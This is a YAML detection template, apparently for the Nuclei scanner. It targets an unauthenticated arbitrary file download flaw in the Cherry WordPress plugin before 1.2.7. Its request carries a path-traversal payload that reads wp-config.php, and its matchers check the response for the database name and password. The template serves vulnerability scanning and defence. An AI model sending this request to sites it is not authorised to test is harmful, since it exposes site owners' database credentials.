id: cherry-file-download

info:
  name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
  author: 0x_Akoko
  severity: high
  description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
  reference:
    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
    - https://github.com/CherryFramework/cherry-plugin
  tags: wordpress,wp-plugin,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200